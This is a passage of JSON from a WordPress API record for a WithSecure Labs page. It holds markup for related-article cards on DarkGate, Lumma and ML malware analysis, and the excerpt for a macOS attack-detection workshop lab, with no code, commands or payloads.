wp-component-content--default wp-block-cards__content\">\n            <h2 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Related <span class=\"blue-text\">Labs content<\/span><\/h2>                    <div class=\"wp-component-content__inner\">\n                                    <div class=\"wp-component-content__content wysiwyg\">\n                        <div class=\"wp-component-paragraph \">\n    <p class=\"text--p-medium\"><span data-teams=\"true\">Find related content relating to this topic.<\/span><\/p>\n<\/div>\n                    <\/div>\n                                                            <\/div>\n                <\/div>                            <div\n                class=\"swiper wp-block-cards__swiper js-wp-block-cards-swiper\"\n                data-slides-per-view-desktop=\"auto\"\n                data-slides-per-view-tablet=\"auto\"\n                data-slides-per-view-mobile=\"auto\"\n            >\n                <div class=\"swiper-wrapper wp-block-cards__swiper-wrapper row-load\">\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">DarkGate Rises: New version of DarkGate malware hunts like a Duck but bites like a RAT<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Source: https:\/\/labs.withsecure.com\/publications\/darkgate-rises<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/darkgate-rises\/\">En savoir plus<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Reverse engineering a Lumma infection<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Lumma is an information stealer that the WithSecure Detection and Response Team (DRT) have encountered several times. It has seen wider use over the past couple of years, and makes for an interesting threat to monitor.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/reverse-engineering-a-lumma-infection\/\">En savoir plus<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">AI security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Machine learning-driven malware analysis<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">With the rapid emergence of new malware variants, accurately classifying and attributing malware samples has become more challenging than ever<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/machine-learning-driven-malware-analysis\/\">En savoir plus<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                    <\/div>\n                <div class=\"wp-block-cards__nav fade-in\">\n                    <div class=\"wp-block-cards__pagination js-wp-block-cards-pagination\">\n                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-prev\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>Over the three labs we have set out for this workshop, we&rsquo;re aiming to develop an initial level of understanding for some of the attacks we see against macOS and most importantly how we can implement appropriate detections. The labs for this workshop are comprised of the following key areas:<\/p>\n","protected":false},"author":3,"featured_media":0,"template":"","categories":[306,328,307],"labs_content_type":[309],"class_list":["post-10501","lab_item","type-lab_item","status-publish","hentry","category-attack-detection","category-endpoint-security","category-software-protection"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg 618w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-300x214.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-447x318.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-205x146.jpg 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Endpoint Security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals 2021: macOS &#8211; Lab #1<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Over the three labs we have set out for this workshop, we&#039;re aiming to develop an initial level of understanding for some of the attacks we see against macOS and most importantly how we can implement appropriate detections. The labs for this workshop are comprised of the following key areas:<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-2021-macos-lab-1\/\">En savoir plus<\/a>            <\/div>\n            <\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/lab_item\/10501","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/users\/3"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/media?parent=10501"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/categories?post=10501"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/labs_content_type?post=10501"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}